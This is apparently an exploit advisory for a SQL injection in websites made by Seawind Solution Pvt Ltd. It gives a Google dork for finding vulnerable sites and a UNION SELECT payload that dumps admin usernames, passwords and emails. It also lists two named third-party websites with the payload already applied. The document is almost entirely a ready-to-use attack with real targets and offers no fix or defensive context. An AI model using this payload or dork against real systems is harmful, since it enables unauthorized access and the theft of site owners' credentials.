######################################################################################### # Exploit Title : Design & Developed By Seawind Solution Pvt Ltd. Sql injection # Google Dork : inurl:.php?id= intext:"Design & Developed By Seawind Solution Pvt Ltd." # Exploit Author: Mikayil Ilyas / CYBER-WARRIOR.ORG / Bug Researchers # Vendor Homepage: http://www.india.seawindsolution.com/ # Contact : mikayil.ilyasov@gmail.com # Software Link: N/A # version : N/A # Date :03.02.2019 # Tested on : Windows 7 , Kali Linux # CVE : # Video : https://www.youtube.com/watch?v=ejXQ15-dG2k ########################################################################################## + Payload : - [ourtarget.com]/page.php?id= and 1=0 UNION SELECT 1,2,database(),4,group_concat(A_USERNAME,0x3a,A_PASSWORD,0x3a,A_EMAIL),6,7,8,9,10,11,12,13,14,15 from admin --+- + Admin Panel : N/A + Example : http://www.gmchemicals.co.in/page.php?id=3 and 1=0 UNION SELECT 1,2,database(),4,group_concat(A_USERNAME,0x3a,A_PASSWORD,0x3a,A_EMAIL),6,7,8,9,10,11,12,13,14,15 from admin --+- http://nishanelectric.com/page.php?id=3%20and%201=0%20UNION%20SELECT%201,2,database(),4,group_concat(A_USERNAME,0x3a,A_PASSWORD,0x3a,A_EMAIL),6,7,8,9,10,11,12,13,14,15%20from%20admin%20--+